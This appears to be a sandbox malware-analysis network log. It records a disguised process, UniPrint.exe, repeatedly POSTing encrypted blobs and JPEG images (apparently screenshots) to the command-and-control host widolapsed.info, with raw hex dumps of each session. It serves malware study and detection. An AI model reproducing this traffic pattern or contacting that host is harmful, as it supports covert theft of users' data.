                                                                                                      2021-09-15 11:45:47 UTC1199OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76660
                                                                                                      Content-Type: multipart/form-data; boundary=--------3047557173
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:47 UTC1200OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 30 34 37 35 35 37 31 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3047557173Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:47 UTC1200OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 a6 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:45:47 UTC1200OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:47 UTC1216OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:47 UTC1232OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:47 UTC1248OUTData Raw: 52 95 29 bd 91 4a 8a d4 5d 1a 73 f7 8a af d4 d3 c6 93 1a f3 25 cc 63 f1 ac de 22 1d cb 58 6a 8f a1 93 c5 18 ad 7f b2 69 b1 ff 00 ac ba 07 e9 47 9b a4 47 fd e7 a5 ed fb 26 52 c3 3e ad 23 27 14 f1 1b 9e 02 93 f8 56 89 d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8
                                                                                                      Data Ascii: R)J]s%c"XjiGG&R>#'V:_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KV
                                                                                                      2021-09-15 11:45:47 UTC1264OUTData Raw: 0d 36 a5 b2 92 17 34 52 50 68 b8 05 14 94 52 18 ea 29 29 69 88 ab 4b 45 15 89 b0 51 45 14 00 51 45 14 00 51 45 25 00 2d 14 51 40 05 14 51 40 05 14 51 4c 05 a2 92 8a 00 5a 4a 5a 28 01 28 a2 8a 00 28 a2 8a 00 5a 29 28 a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14
                                                                                                      Data Ascii: 64RPhR))iKEQEQEQE%-Q@Q@QLZJZ(((Z)(!i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h
                                                                                                      2021-09-15 11:45:47 UTC1274OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 30 34 37 35 35 37 31 37 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3047557173--
                                                                                                      2021-09-15 11:45:58 UTC1274INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:47 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=8c27c54f2fd76dc0ad9226e04f257e8207cb76898200853e1b0060be8d5aa986; expires=Thu, 15-Sep-2022 11:45:47 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:58 UTC1275INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      16192.168.2.34980345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:00 UTC1275OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76627
                                                                                                      Content-Type: multipart/form-data; boundary=--------3142017803
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:00 UTC1275OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 34 32 30 31 37 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3142017803Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:00 UTC1275OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ef d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:00 UTC1275OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:00 UTC1291OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:00 UTC1307OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:00 UTC1323OUTData Raw: fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac dd b7 46 c7 d2 b3 a8 aa 58 7a 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34 b9 a6 8a 5a 56 2d 49
                                                                                                      Data Ascii: +DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxTFXzk}Km\:o#urNZg%V'4ZV-I
                                                                                                      2021-09-15 11:46:00 UTC1339OUTData Raw: 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e cd 14 da 5a 2e 16 16 8c d2 66 93 34 5c 2c 3b 34 66 9b 9a 28 b8 58 7e 68 cd 36 8c d3 b8 ac 3b 34 99 a6 d2 e6 95 c7 61 73 4b 9a 6d 26 68 b8 58 75 19 a4 cd 14 5c 2c 3b
                                                                                                      Data Ascii: PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@Z.f4\,;4f(X~h6;4asKm&hXu\,;
                                                                                                      2021-09-15 11:46:00 UTC1350OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 34 32 30 31 37 38 30 33 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3142017803--
                                                                                                      2021-09-15 11:46:13 UTC1350INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:00 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=cf7acf491945062ccba84d5e56673d456edfffe67f71e94ae1b80e303c8e026e; expires=Thu, 15-Sep-2022 11:46:01 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:13 UTC1350INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      17192.168.2.34980445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:14 UTC1350OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76637
                                                                                                      Content-Type: multipart/form-data; boundary=--------2197444700
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:14 UTC1351OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 39 37 34 34 34 37 30 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2197444700Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:14 UTC1351OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e5 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:14 UTC1351OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:14 UTC1367OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:14 UTC1383OUTData Raw: 00 8f e8 be b4 b7 67 37 52 7f bd 58 7f cb d2 df f0 c8 a9 28 a2 b5 31 16 8a 4a 5a 00 28 a2 8a 04 2d 14 94 b4 80 28 a2 8a 04 14 b4 94 b4 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6
                                                                                                      Data Ascii: g7RX(1JZ(-()i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{S
